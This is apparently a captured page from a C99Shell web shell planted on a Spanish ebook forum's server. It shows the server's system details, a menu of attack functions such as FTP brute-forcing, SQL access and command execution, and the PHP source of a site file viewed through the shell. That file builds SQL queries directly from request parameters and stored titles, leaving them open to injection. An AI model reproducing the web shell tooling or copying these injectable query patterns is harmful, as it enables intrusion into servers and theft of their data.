foro.papyrefb2.com

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!
Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023 aarch64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /home/wwwroot/frames/ drwxrwxr-x Free 83.24 GB of 96.73 GB (86.05%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php

   include "conn.php";

   include "RatingManager.inc.php";

   

   if (@!$_REQUEST['ID']){

   

   $sql="select libros.id as id1,titulo,autor,ruta from papyr225_papyre.libros 

left outer join papyr225_papyre.ratings on libros.id=ratings.id

where inftp!=1     and jump_id=0   order by libros.autor  asc  limit  20";

   }ELSE{

$sql="select libros.id as id1,titulo,autor,ruta from papyr225_papyre.libros 

left outer join papyr225_papyre.ratings on libros.id=ratings.id

where inftp!=1    and  libros.id={$_REQUEST['ID']} and jump_id=0 order by libros.id limit 20 ";



   }

   

   $res=mysql_query($sql);

$row=mysql_fetch_array($res);  

   

  $titulo=trim($row['titulo']);

          if (substr($titulo,0,1)=="("){

              // es una serie.

              // buscamos cuando cierra el   

              $titulo=hasta($titulo,')','(');

       }

       

       

       

      if (substr($titulo,strlen($titulo)-1,1)==")"){

            

            //eliminamosla

           $posicion=strpos($titulo,"("); 

          $titulo=substr($titulo,0,$posicion); 

           

            

            

            

      }    

      

      

  

   

              $sql3="select libros.id as id2,titulo,autor,ruta from papyr225_papyre.libros

left outer join papyr225_papyre.ratings on libros.id=ratings.id

 where inftp=1  and titulo like '%$titulo%' order by titulo";

 

              $resrr=mysql_query($sql3); 

           $rowrr=mysql_fetch_array($resrr); 

   

   

   

   

   

   // taxpuza! dos veces la misma query, para sacar el numero primero.

   

    if (@!$_REQUEST['ID']){

   

   $sql="select libros.id as id1,titulo,autor,ruta from papyr225_papyre.libros 

left outer join papyr225_papyre.ratings on libros.id=ratings.id

where inftp!=1     and jump_id=0   order by libros.autor  asc  limit  20";

   }ELSE{

$sql="select libros.id as id1,titulo,autor,ruta from papyr225_papyre.libros 

left outer join papyr225_papyre.ratings on libros.id=ratings.id

where inftp!=1    and  libros.id={$_REQUEST['ID']} and jump_id=0 order by libros.id limit 20 ";



   }  

   

   

   

   

   

 $res=mysql_query($sql);   

?>

 <FORM action="./jump_viejos.php" method="POST"><?

 $array_id=array(); 

  

   while($row=mysql_fetch_array($res)){

     echo "<table border=1>";   

     if (!array_search($row['id1'],$array_id)){

          $array_id[].=$row['id1'];

          echo "<tr><td bgcolor=#FFC0C0>{$row['id1']}<td>{$row['titulo']}<td>{$row['autor']}

          <td>";?><INPUT type="text" size="80" name="id-ruta-<?ECHO $row['id1'];?>" value="<?echo $row['ruta'];?>">

           <td>

          <td><INPUT type="text" name="id-book-<?ECHO $row['id1'];?>" value="<?echo $rowrr['id2'];?>"></tr><?

          

          $titulo=trim($row['titulo']);

          if (substr($titulo,0,1)=="("){

              // es una serie.

              // buscamos cuando cierra el   

              $titulo=hasta($titulo,')','(');

       }

       

       

       

      if (substr($titulo,strlen($titulo)-1,1)==")"){

            

            //eliminamosla

           $posicion=strpos($titulo,"("); 

          $titulo=substr($titulo,0,$posicion); 

           

            

            

            

      } 

              

        $sql2="select libros.id as id1,titulo,autor,ruta from papyr225_papyre.libros

left outer join papyr225_papyre.ratings on libros.id=ratings.id

 where inftp!=1    and jump_id=0  and titulo like '%$titulo%' and libros.id !={$row['id1']} order by libros.id asc    ";  





    

           $res2=mysql_query($sql2); 

           

           while($row2=mysql_fetch_array($res2)){ 

               if (!array_search($row2['id1'],$array_id)){

          $array_id[].=$row2['id1'];

               

               

               

               

               

          echo "<tr><td bgcolor=#FFC0C0>{$row2['id1']}<td>{$row2['titulo']}<td>{$row2['autor']}

          <td>";?><INPUT type="text" size="80" name="id-ruta-<?ECHO $row2['id1'];?>" value="<?echo $row2['ruta'];?>">

          <td>

          <td><INPUT type="text"  name="id-book-<?ECHO $row2['id1'];?>" value="<?echo $rowrr['id2'];?>"></tr><? 

            }

              }

              $sql3="select libros.id as id2,titulo,autor,ruta from papyr225_papyre.libros

left outer join papyr225_papyre.ratings on libros.id=ratings.id

 where inftp=1  and titulo like '%$titulo%' order by titulo";

 

              $res3=mysql_query($sql3); 

           while($row3=mysql_fetch_array($res3)){ 

          echo "<tr><td bgcolor=##C0FFC0>{$row3['id2']}<td>{$row3['titulo']}<td>{$row3['autor']}

          <td>{$row3['ruta']}

          <td></TR>";

        }

              

                 

       echo "</table>";

    echo "<br>";   



   }

          }

    ?>

    <INPUT type="submit" value="Enviar"> <INPUT type="reset">

    </form>

    <?

          



die();

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   

   //---------serializar

   $sql="select * from papyr225_papyre.ratings where id=37";

   $row=mysql_fetch_array(mysql_query($sql,$conn));

   $variable=unserialize($row['used_ips']);

   echo count($variable);

   

   echo "<pre>";

   print_r($variable);

   

   $var2=serialize($variable);

   

   print_r($var2);

   

   

   

   

   function hasta($ccadena,$vdesde,$vhasta)    

   {   

       

   if (!$ccadena=strstr($ccadena,$vdesde)){

      return(null);

   }

   

   ## ahora, contamos hasta desde $desde 

   ## hasta el caracter $vhasta

   $ccadena=substr($ccadena,strlen($vdesde));

   $c="";

   $a=0;

   $b="";



  

     while(!strstr($c,$vhasta) and  $a<strlen($ccadena)) {

          

              $b=substr($ccadena,$a,1);

              

            

       $c=$c.$b;

 

       $a++;

       

 

      

  

  

}



if ($a<strlen($ccadena)) {

 return(substr($c,0,(strlen($c)-(strlen($vhasta)))));

   }else{

   return(substr($c,0,(strlen($c))));

   }

          

  

   }

?>
:: Command execute ::
Enter:	Select: